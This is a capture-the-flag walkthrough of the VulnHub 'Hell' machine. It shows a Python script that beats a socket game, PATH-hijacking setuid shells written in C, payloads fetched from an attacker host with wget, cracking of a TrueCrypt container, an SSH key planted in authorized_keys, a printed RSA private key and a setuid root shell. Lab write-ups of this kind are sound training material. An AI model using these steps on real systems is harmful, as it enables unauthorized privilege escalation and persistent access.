State      Recv-Q Send-Q                                               Local Address:Port                                                 Peer Address:Port 
LISTEN     0      50                                                       127.0.0.1:3306                                                            *:*     
LISTEN     0      128                                                              *:57356                                                           *:*     
LISTEN     0      128                                                             :::111                                                            :::*     
LISTEN     0      128                                                              *:111                                                             *:*     
LISTEN     0      128                                                             :::80                                                             :::*     
LISTEN     0      128                                                             :::59635                                                          :::*     
LISTEN     0      128                                                             :::22                                                             :::*     
LISTEN     0      128                                                              *:22                                                              *:*     
LISTEN     0      20                                                             ::1:25                                                             :::*     
LISTEN     0      20                                                       127.0.0.1:25                                                              *:*     
LISTEN     0      10                                                               *:666                                                             *:*     
$ ./game &
$ I'm listening

$ ss -lnt
State      Recv-Q Send-Q                                               Local Address:Port                                                 Peer Address:Port 
LISTEN     0      50                                                       127.0.0.1:3306                                                            *:*     
LISTEN     0      128                                                              *:57356                                                           *:*     
LISTEN     0      128                                                             :::111                                                            :::*     
LISTEN     0      128                                                              *:111                                                             *:*     
LISTEN     0      128                                                             :::80                                                             :::*     
LISTEN     0      128                                                             :::59635                                                          :::*     
LISTEN     0      128                                                             :::22                                                             :::*     
LISTEN     0      128                                                              *:22                                                              *:*     
LISTEN     0      10                                                               *:1337                                                            *:*     
LISTEN     0      20                                                             ::1:25                                                             :::*     
LISTEN     0      20                                                       127.0.0.1:25                                                              *:*     
LISTEN     0      10                                                               *:666                                                             *:*     
$

After I run the game program and check listening ports, I found game is listening on port 1337.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
$ telnet 127.0.0.1 1337
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
Type 'START' to begin

START 
Starting...

You have 30 seconds to get as many points as you can, beat the high score! (High Score: 133723)

Quick what's... 769 x 49? 48
Quick what's... 413 x 17? 15
Quick what's... 779 x 106? 45
Quick what's... 439 x 803? 55
Quick what's... 555 x 341? 821
Quick what's... 976 x 1? 
Lol nope

Final Score: 0

Connection closed by foreign host.
[1] + Done                       ./game
$

In order to win the game, I wrote a python script to calculate and send the result back to program.

my_win.py (my_win.py) download
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
#!/usr/bin/python

import socket
import re

ip = "127.0.0.1"
port = 1337

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
conn = s.connect((ip,port))
res = s.recv(1024)
print res
s.send('START/n')
res = s.recv(1024)
print res

while True:
  res = s.recv(1024)
  data = re.findall(r"Quick what's\.\.\. (.*)\?", res)
  if not data:
      print "pattern is not found!"
      print res
      break
  else:
      (a,b) = data[0].split(' x ')
      rst = int(a) * int(b)
      print rst
      s.send(str(rst)+'\n')

print '[*] Done!'
s.close()

After running the script and win the game, something new appeared I hear the faint sound of chmodding......... That sounds like command chmod has been called after win the game.

Now I decided to check if the command chmod is called from absolute path or not. I upload setuid.c to target server’s temporary directory /tmp/, compile it and change the name to chmod.

setuid.c (setuid.c) download
1
2
3
4
5
6
7
8
9
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
int main()
{
 setuid(1000);
 system( "/bin/sh -i" );
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
$ wget http://10.10.10.131/setuid.c
--2015-07-16 08:49:24--  http://10.10.10.131/setuid.c
Connecting to 10.10.10.131:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 122 [text/x-csrc]
Saving to: `setuid.c'

100%[======================================>] 122         --.-K/s   in 0s      

2015-07-16 08:49:24 (14.9 MB/s) - `setuid.c' saved [122/122]

$ ls -l
total 4
-rw-r--r-- 1 milk_4_life milk_4_life 122 Jul 15 22:47 setuid.c
$

Next I add /tmp to the beginning of the environmental PATH variable. Then I play the game and run python script to win.

1
2
3
4
5
6
7
8
9
10
11
12
$ printenv PATH
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
$ export PATH=/tmp:$PATH
$ printenv PATH
/tmp:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
$ ./game
I'm listening
$ whoami
george
$ id
uid=1002(milk_4_life) gid=1002(milk_4_life) euid=1000(george) groups=1000(george),1002(milk_4_life)
$

Bingo! I am george now. After poking around in the file system, I found container.tc file (which is a Truecrypt encrypted file) in george’s home directory. Also george has an email which shows a clue to crack the encrypted file by using rockyou password dictionary.

Moving to bazza

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
$ pwd
/home/george
$ ls -l
total 4096
-rw------- 1 george george 4194304 Jul 12 08:30 container.tc
$ find / -user george -perm -g=s -o -perm -u=s -type f 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/pt_chown
/usr/sbin/exim4
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/procmail
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/sudoedit
/usr/bin/game.py
/usr/bin/lesson101
/sbin/mount.nfs
/var/mail/george
/bin/umount
/bin/ping
/bin/su
/bin/mount
/bin/ping6
$ ls -l /var/mail/george
total 4
-rw-r--r-- 1 george george 175 Jun 20  2014 signup.eml
$ cat /var/mail/george/signup.eml
From: admin@rockyou.com
To: super_admin@hell.com
Subject: Account Activation
Date: 13th November 2009

Thanks for signing up for your account. I hope you enjoy our services. 
$

Then I downloaded the container file container.tc to my Kali and use truecrack with rockyou.txt to crack the password. Due to my laptop do not have a strong GPU so I could not take advantage of hashcat which is really disappointed. T.T

However, the hard way is still working, just a little slow… after waiting for a quite while, I finally cracked the password: letsyouupdateyourfunnotesandmore

In order to get a better shell with full privilege of george, I use ssh-keygen to generate a new ssh key pair (passphrase is test1337) and upload the public key to target server as .ssh/authorized_keys. Then use the private key to login via SSH.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
root@kali:~# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): g_id_rsa
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in g_id_rsa.
Your public key has been saved in g_id_rsa.pub.
The key fingerprint is:
81:82:98:44:59:c7:f2:68:fe:b8:76:04:f1:b1:a2:97 root@kali
The key's randomart image is:
+--[ RSA 2048]----+
|.oo...           |
|.+ +.o .         |
|o . B + .        |
|   = =   .       |
|  + +   S        |
| . E .           |
|  . +            |
|   o o           |
|  ..o            |
+-----------------+

Now back to target server to create .ssh folder and pull the SSH private key from my Kali.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
$ mkdir .ssh
$ cd .ssh
$ wget http://10.10.10.131/g_id_rsa.pub -O authorized_keys
--2015-07-16 10:19:59--  http://10.10.10.131/g_id_rsa.pub
Connecting to 10.10.10.131:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 391
Saving to: `authorized_keys'

100%[==================================================================================================>] 391         --.-K/s   in 0s      

2015-07-16 10:19:59 (59.7 MB/s) - `authorized_keys' saved [391/391]

$ ls
authorized_keys
$ ls -l
total 4
-rw-r--r-- 1 george milk_4_life 391 Jul 16 00:19 authorized_keys
$ /bin/chmod 600 authorized_keys
$ ls -l
total 4
-rw------- 1 george milk_4_life 391 Jul 16 00:19 authorized_keys
$

SSH login with password test1337

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
root@kali:~/hell# ssh george@10.10.10.146 -i g_id_rsa
Enter passphrase for key 'g_id_rsa': 
Linux hell 3.2.0-4-486 #1 Debian 3.2.57-3+deb7u2 i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
No mail.
Last login: Thu Jul 16 10:14:43 2015 from 10.10.10.131
george@hell:~$ id
uid=1000(george) gid=1000(george) groups=1000(george),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev)
george@hell:~$ pwd
/home/george
george@hell:~$ ls -l
total 4096
-rw------- 1 george george 4194304 Jul 12 08:30 container.tc
george@hell:~$

After get into the truecrypt container, I found a RSA private key file which should be someone’s SSH key.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
george@hell:~$ truecrypt container.tc 
Enter mount directory [default]: 
Enter password for /home/george/container.tc: 
Enter keyfile [none]: 
Protect hidden volume (if any)? (y=Yes/n=No) [No]: 
george@hell:~$ df -h
Filesystem                                              Size  Used Avail Use% Mounted on
rootfs                                                  7.6G  1.4G  5.8G  20% /
udev                                                     10M     0   10M   0% /dev
tmpfs                                                    51M  224K   51M   1% /run
/dev/disk/by-uuid/c53be26e-768a-4c87-90d3-792c47148ca4  7.6G  1.4G  5.8G  20% /
tmpfs                                                   5.0M     0  5.0M   0% /run/lock
tmpfs                                                   178M     0  178M   0% /run/shm
/dev/mapper/truecrypt1                                  3.8M  2.0K  3.8M   1% /media/truecrypt1
george@hell:~$ cd /media/truecrypt1
george@hell:/media/truecrypt1$ ls -l
total 2
-rwx------ 1 george george 1679 Jul  5  2014 id_rsa
george@hell:/media/truecrypt1$ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEAxlCbg0ln2dqRO3iIXPUvK3irg/9l5uvBAQdXTVmcm/JWN9OA
25XtZX8LOfiJtc+8OYXgD6lXNVPh9BjElq6qpR7fk1TaXXUlyiSlwCxz68n/cpYs
f6UUa9QXm0LSHD8m7g/e5qqIm8bb15TIC6+8TmSB11FE9NLPN+8hVyP1S9EBntom
t5watKDFUNF+mcl14Tj+INcWB2qpEPgZ1mIwq1Zw3w/vy27y0i1r52+fot1vgf2K
Ymo6GipsdxW1k/UuCjJEE6e0GZFA8vhpH5F4MG8k33vIPqkxgEgF0GX8RPAQF/Xf
gxERhkGP+hVOd8b11OXzxWGGQyqwOYF8+7qVjwIDAQABAoIBAQCyldpFUvBDXbEV
dgiOdXkh04vY1UBlv/3ROFQk4sLGKGf94+gRViUvFkX80VTptgWRY36Pe/Z9nmlG
0JsP+oDPK0s4uNvf92Otcm0U7rMBLals/dFarUUDiT4s4fKl3zTmgsI+xGk6psxI
icHPzFRt39KRHK1VLxXOD/jdKRN3Tk0odH1kNahOuFC2F5T+aqdlC/RAGwxnTDBe
AFPFlns83GaPYlIt05DZsdGftG7mITkNfUVS5AIyeedshU4OyPXu5bGgUgbtars4
GdttJ33Tm5hO+n3E93sW7XMKG4v4po+1Fu0OwNQNpaRo6gVqK7AZHNPxBRW7K4Zc
w2d0EXehAoGBAOQgtqb5QVyhiCdT53xjZTMHH74ApWRpsoLtu/LaZnQV0v/dzEIv
jei58v/PusXsSwOQeb4p2obOReQFbYG48vCiywwMbeOeqH2d69HYatHmxPXngKS3
6trus/pHuDJosFw1qhgVo9ao0o8IH6cveHidmwvzKfiphgM3yCXF9jyxAoGBAN6L
awHXmHQCsCq//UbHbfuaBScJOpaagKP1BIskl5RDaQ/U/DzSpxju0ldedX7HYVFW
Rk6NQQ6QiXIC/5D7Xj+tcR2EFI+Tt9xp6dE/UlxpUL1h9QCBfmdw0CT9WSwJEGF7
R+D18trKcb/NkYdJV8ZpaT00rLzyBx5MY/FZbYY/AoGBALrCwWXfR5BjOckgmrGt
2cq1uVnew4h6M8eWgzklbZz5xPzuAuvobKAro3GkCb9BXIQ1gkWZlCqqsnMjsmvy
EwnH7L0Xa9teJ4h3gfkQ2Rqwd2ztstanLyE/LJ7omjbCmCdVU8RV6wSwv3iTaP6B
EXqFZMqarzDA8FKwFy49bAJxAoGBALkXBYG7uW1LSw/TLCjw9zVaTUzBLTxS9gjn
YMcFQRir1Da5sqw3m4huIP1Pb7NoyjTm54SvkNs3NUlg2wPPPP0DGOAumRctCa9F
W5WP78UyRlesoCOyj9oihsss9zxbsYcSDJ86j6iO1Xpr08zMIDfCNigUplJjja4S
ZNE3ypLrAoGAbp+vBcqQRfnXWfmcdnHYFbwgWbokPSe2fScajWiyvcg4/6gL1e50
rpO3RTOREUD02pBbyG4LDFv7x/5niqASL0tS8/0xWDBDj5QmD9UTmMd5hsMbj8Lw
qJA0ErZEjIE9+jXYLbsTsB8tRTsqMqBfCCovHXAjy0h5B6j500PfImM=
-----END RSA PRIVATE KEY-----
george@hell:/media/truecrypt1$

Then I download the SSH private key file to my Kali and try use it to login accounts found before.(only bazza and oj left)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
root@kali:~/hell# ssh bazza@10.10.10.146 -i tr_id_rsa 
Linux hell 3.2.0-4-486 #1 Debian 3.2.57-3+deb7u2 i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have mail.
Last login: Thu Jul 16 10:32:07 2015 from 10.10.10.131
$ id
uid=1004(bazza) gid=1004(bazza) groups=1004(bazza)
$ ls -alh   
total 40K
drwx------ 3 bazza bazza      4.0K Jul 17 08:35 .
drwxr-xr-x 7 root  root       4.0K Jul  5  2014 ..
-rw-r--r-- 1 root  root        109 Jul  6  2014 barrebas.txt
-rw------- 1 bazza bazza       492 Jul 13 01:33 .bash_history
-r-xr-sr-x 1 oj    developers 6.1K Jul  6  2014 part1
-r-sr-xr-x 1 oj    oj         5.2K Jul  6  2014 part2
drwx------ 2 bazza bazza      4.0K Jul  5  2014 .ssh
-rw------- 1 bazza bazza       781 Jul 13 01:42 .viminfo
$

Moving to oj

Here we found executable program: part1 and part2 which has sticky bit set and owned by oj, so here should give a close check.

1
2
3
4
5
6
7
8
9
10
$ ./part1
Checking integrity of part2... Done!!

Checking integrity of calling target... Done!!

Binary and target confirmed.

Can't touch this *nah na na na na naaaaaaaa nah*
uid=1004(bazza) gid=1004(bazza) euid=1005(oj) egid=1003(developers) groups=1005(oj),1004(bazza)
$

Here we can see that the running program has executed system command id. So very similar method used previously, I upload setuid.c and change it a little bit as follow and then gcc compile it to /tmp/id, then set environmental variable PATH to include /tmp at the beginning.

baz2.c (baz2.c) download
1
2
3
4
5
6
7
8
9
10
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
int main()
{
 setuid( 1005 );
 system("/usr/bin/id");
 system( "/bin/sh -i" );
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
$ gcc baz2.c -o /tmp/id
$ ls -l /tmp
total 8
-rwxr-xr-x 1 bazza bazza 5028 Jul 17 08:26 id
$ ./part1
Checking integrity of part2... Done!!

Checking integrity of calling target... Done!!

Binary and target confirmed.

Can't touch this *nah na na na na naaaaaaaa nah*
uid=1004(bazza) gid=1004(bazza) euid=1005(oj) egid=1003(developers) groups=1005(oj),1004(bazza)
oj
$ whoami
oj
$ /usr/bin/id
uid=1004(bazza) gid=1004(bazza) euid=1005(oj) egid=1003(developers) groups=1005(oj),1004(bazza)

Now, I am oj. :D

1
2
3
4
5
6
7
8
9
10
11
$ whoami 
oj
$ ls -al
total 592
drwx------ 2 oj   oj     4096 Jul 17 23:48 .
drwxr-xr-x 7 root root   4096 Jul  5  2014 ..
-r-sr-xr-x 1 root root 592549 Jul  5  2014 echo
-rw-r--r-- 1 root root    154 Jul  5  2014 How to be an infosec rockstar 101.txt
$ ./echo AAAA-%p-%p 
AAAA-0x80488c0-0xbffffce8$ 
$

Here I found one executable file owned by root under oj’s home folder and that file has sticky bit been set which could be a way to ROOT. Also echo program has Format String vulnerability

Getting ROOT

After suffering a lot of hours painful to deal with Format String exploit about echo. I still could not make it work for me :`(

However, there is another way to privilege escape to ROOT, which has been demostrated by vincius777

getroot2.c (getroot2.c) download
1
2
3
4
5
6
7
8
9
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
int main()
{
 setuid(0);
 system( "/bin/sh -i" );
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
george@hell:~$ df -h
Filesystem                                              Size  Used Avail Use% Mounted on
rootfs                                                  7.6G  1.4G  5.8G  20% /
udev                                                     10M     0   10M   0% /dev
tmpfs                                                    51M  224K   51M   1% /run
/dev/disk/by-uuid/c53be26e-768a-4c87-90d3-792c47148ca4  7.6G  1.4G  5.8G  20% /
tmpfs                                                   5.0M     0  5.0M   0% /run/lock
tmpfs                                                   178M     0  178M   0% /run/shm
/dev/mapper/truecrypt1                                  1.8M   26K  1.7M   2% /media/truecrypt1
george@hell:~$ cd /media/truecrypt1
george@hell:/media/truecrypt1$ ls -l
total 18
-rwsrwxrwx 1 root root   152 Jul 17 17:13 getroot
-rwsrwxrwx 1 root root  4970 Jul 17 17:14 getroot2
drwx------ 2 root root 12288 Jul 17 17:09 lost+found
george@hell:/media/truecrypt1$ ./getroot2
# id
uid=0(root) gid=1000(george) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(george)
# pwd
/media/truecrypt1
# whoami
root
# cat /root/flag.txt
Congratulations of beating Hell. 

I hope you enjoyed it and there weren't to many trolls in here for you. 

Hit me up on irc.freenode.net in #vulnhub with your thoughts (Peleus) or follow me on twitter @0x42424242

Flag: a95fc0742092c50579afae5965a9787c54f1c641663def1697f394350d03e5a53420635c54fffc47476980343ab99951018fa6f71f030b9986c8ecbfc3a3d5de


#
2015-07-17 00:01:30 -0400